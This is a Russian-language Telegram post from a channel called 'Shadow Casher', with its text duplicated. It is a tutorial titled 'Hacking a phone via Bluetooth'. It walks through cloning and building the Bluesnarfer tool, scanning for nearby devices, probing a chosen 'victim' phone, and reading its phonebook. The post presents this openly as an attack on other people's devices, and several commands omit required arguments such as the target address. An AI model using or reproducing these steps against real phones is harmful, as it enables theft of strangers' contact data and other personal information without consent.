Forwarded From Shadow Casher
https://telegra.ph/file/509fcc3016c4e8c7ef371.jpgВзламываем телефон через Bluetooth
Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.
Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах.
В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer.
Установка и эксплуатация
Открываем терминал и вводим команду для обновления пакетов:
sudo apt-get update && apt-get upgrade
Далее клонируем репозиторий с помощью команды:
git clone https://github.com/boos/bluesnarfer
Переходим в директорию:
cd bluesnarfer
И компилируем утилиту:
make
После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:
hciconfig hci0 up
Далее сканируем доступные устройства с включенным Bluetooth:
hcitool scan
Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:
l2ping
Просматриваем возможность подключения к жертве, используя rfcomm:
sdptool browse --tree --l2cap
Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:
bluesnarfer -r -b
Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:
bluesnarfer -h
@ShadowCasher
https://telegra.ph/file/509fcc3016c4e8c7ef371.jpgВзламываем телефон через Bluetooth
Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами.
Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах.
В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer.
Установка и эксплуатация
Открываем терминал и вводим команду для обновления пакетов:
sudo apt-get update && apt-get upgrade
Далее клонируем репозиторий с помощью команды:
git clone https://github.com/boos/bluesnarfer
Переходим в директорию:
cd bluesnarfer
И компилируем утилиту:
make
После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере:
hciconfig hci0 up
Далее сканируем доступные устройства с включенным Bluetooth:
hcitool scan
Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит:
l2ping
Просматриваем возможность подключения к жертве, используя rfcomm:
sdptool browse --tree --l2cap
Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы:
bluesnarfer -r -b
Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки:
bluesnarfer -h
@ShadowCasher
